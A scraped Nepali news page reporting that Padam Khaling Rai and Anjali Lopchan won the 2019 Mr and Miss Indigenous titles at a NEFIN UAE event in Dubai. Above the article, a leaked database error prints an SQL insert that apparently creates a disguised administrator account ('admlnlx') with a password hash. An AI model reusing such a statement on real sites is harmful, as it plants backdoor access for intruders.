WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNsDf7j4EX/gbhOHMsldHk/v.5nChK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 01:03:40', '', 'admlnlx', 'admlnlx')

“मिस्टर र मिस इन्डिजिनियस २०१९”को उपाधी पदम खालिङ र अन्जली लोप्चन लाई – Gaule Khabar

“मिस्टर र मिस इन्डिजिनियस २०१९”को उपाधी पदम खालिङ र अन्जली लोप्चन लाई

“मिस्टर र मिस इन्डिजिनियस २०१९”को उपाधी पदम खालिङ र अन्जली लोप्चन लाई

गाउँले न्युज, २५ साउन, काठमाण्डौ । २५ औ विश्व आदिबासी स्थापना दिवसको अवसरमा नेपाल आदिबासी जनजाती माहासंघ युएईद्वारा आयोजित मिस्टर इन्डिजिनियस २०१९ युएईको उपाधी पदम खालिङ राईले उचाल्न सफल भएका छन् ।

नेपाल आदिबासी जनजाती माहासंघ युएईले “अधिकार, प्रतिनिधित्व र स्वशासनका लागि आदिबासी जनजाती अडान! पहिचान सहितको संघियताका लागी संबिधान संसोधन हाम्रो साझा अभियान” भन्ने मुल नाराका साथ नेफिन सम्बन्द्ध ११ जातिय संस्थाहरु र नेपाल आदिबासी जनजाती पत्रकार महासंघ युएई को संयुक्त आयोजनामा कार्ल्टोन प्यालेस अल मक्तुम रोड देह्रा क्लक टावर छेउ देह्रा दुबइमा कार्यक्रम सम्पन्न गरेको हो ।

किरात राई कलाकार मन्च युएईमा आबद्ध भोजपुरका पदम खालिङ राई भेसभुषा र इन्डिजिनियस टाईटल जित्दै मिस्टर इन्डिजिनियस २०१९ को उपाधी जितेका छन । मिस इन्डिजिनियस २०१९ को टाईटल भने अन्जली लोप्चनले जितेकी छिन् । मिस अन्जली लोप्चनले तामाङ समाज युएई बाट प्रतिनिधित्व गरेकी थिईन् ।

प्रतियोगिताको निर्णयकमा नेपाली समाजका सिपी सापकोटा, किरात राई यायोक्खा शाखा युएईकी अध्यक्ष चन्द्रा साम्पाङ राई, नेफिन युएई का अध्यक्ष महेश मोक्तान, राजु गुरुङ, संघिय समाजका अध्यक्ष बाबुराम लोप्चन, र नेवा पुच का मिना श्रेष्ठ रहेका थिए ।
कार्यक्रममा आदिबासी जनजातिहरुको परिचायक भेषभुसा प्रदर्शनी, जनजातिहरुको मौलिकता झल्किने स्टलहरु पनि राखिएको थियो । नेफिन युएई सँग आबद्ध तमु स्माज युएई, तामाङ समाज युएई, किरात राई ययोक्खा शाखा युएई, किरात याक्थुङ चुम्लुङ युएई, नेपाल मगर संघ शाखा युएई, शेर्पा किदुग युएई, नेवा पुच युएई, थारु कल्यान्कारी सभा युएई, प्रबासी भुजेल सेवा समाज युएई, प्रबासी नेपाली माझी समाज युएई,सुनुवार सेवा समाज युएई को प्रत्यक्ष सहभागीता र सहकार्य रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका